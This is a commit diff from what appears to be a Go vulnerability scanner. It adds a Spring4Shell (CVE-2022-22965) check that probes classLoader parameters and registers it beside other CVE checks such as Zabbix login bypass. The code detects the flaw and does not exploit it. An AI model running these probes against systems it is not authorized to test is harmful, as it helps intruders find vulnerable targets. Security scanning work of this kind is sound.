Spring4Shell

veo · Apr 8, 2022 · ce94008 · ce94008
1 parent b3bb0ef
commit ce94008
Show file tree

Hide file tree

Showing 3 changed files with 25 additions and 1 deletion.
diff --git a/brute/filefuzz.go b/brute/filefuzz.go
@@ -36,7 +36,9 @@ func reqPage(u string) (*page, *pkg.Response, error) {
 			method = "HEAD"
 		}
 	}
-	if req, err := pkg.HttpRequset(u, method, "", false, nil); err == nil {
+	header := make(map[string]string)
+	header["Accept"] = "text/html,*/*;"
+	if req, err := pkg.HttpRequset(u, method, "", false, header); err == nil {
 		if pkg.IntInSlice(req.StatusCode, []int{301, 302, 307, 308}) {
 			page.is302 = true
 		}

diff --git a/pocs_go/Springboot/CVE-2022-22965.go b/pocs_go/Springboot/CVE-2022-22965.go
@@ -0,0 +1,18 @@
+package Springboot
+
+import (
+	"github.com/veo/vscan/pkg"
+)
+
+func CVE_2022_22965(u string) bool {
+	if req, err := pkg.HttpRequset(u+"?class.module.classLoader%5b1%5d=1", "GET", "", false, nil); err == nil {
+		if req.StatusCode == 500 {
+			if req2, err := pkg.HttpRequset(u+"?class.module.classLoader=1", "GET", "", false, nil); err == nil {
+				if req2.StatusCode == 200 {
+					return true
+				}
+			}
+		}
+	}
+	return false
+}
diff --git a/pocs_go/go_poc_check.go b/pocs_go/go_poc_check.go
@@ -172,6 +172,10 @@ func POCcheck(wappalyzertechnologies []string, URL string, finalURL string) []st
 			if zabbix.CVE_2022_23131(URL) {
 				technologies = append(technologies, "exp-ZabbixSAML|bypass-login")
 			}
+		case "Spring":
+			if Springboot.CVE_2022_22965(finalURL) {
+				technologies = append(technologies, "exp-Spring4Shell|CVE_2022_22965")
+			}
 		case "SpringGateway":
 			if Springboot.CVE_2022_22947(URL) {
 				technologies = append(technologies, "exp-SpringGateway|CVE_2022_22947")